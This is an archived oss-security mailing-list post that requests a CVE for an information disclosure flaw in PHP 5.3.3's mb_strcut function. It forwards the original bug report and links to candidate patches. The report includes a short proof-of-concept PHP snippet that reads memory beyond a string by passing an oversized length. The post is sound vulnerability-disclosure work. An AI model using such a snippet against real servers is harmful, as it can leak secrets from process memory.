oss-security - CVE Request: PHP 5.3.3, libmbfl, mb

Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers

[<prev] [next>] [thread-next>] [day] [month] [year] [list]

Date: Sun, 7 Nov 2010 21:22:22 +0100
From: Pierre Joye <pierre.php@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE Request: PHP 5.3.3, libmbfl, mb_strcut

hi,

Mateusz reported the following issue earlier today.

Updated patch, tests pass now: http://pastie.org/1279682

Information disclosure flaw. PHP 5.2 is not affected (newer version of libmbfl).

PHP 5.3 and trunk uses libmbfl 1.1.0.

---------- Forwarded message ----------
From: Mateusz Kocielski <m.kocielski@...il.com>
Date: Sun, Nov 7, 2010 at 6:47 PM
Subject: mb_strcut
To: security@....net

Hello,

 I've found flaw in the mb_strcut function, php doesn't the length
parameter passed to the function in all possible cases.

 Simple exploitation:

<?php
$b = "bbbbbbbbbbb";
str_repeat("THIS IS A SECRET MESSAGE, ISN'T IT?", 1);
$var3 = mb_strcut($b, 0, 1000);
echo $var3;
?>

Pierre suggested the following patch:
http://pastie.org/pastes/1279428/text . I've tested it with your test
suite, one of the mbstring related test cases failed: Bug #49354
(mb_strcut() cuts wrong length when offset is in the middle of a
multibyte character) [ext/mbstring/tests/bug49354.phpt]

-- 
Pierre

@pierrejoye | http://blog.thepimp.net | http://www.libgd.org

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.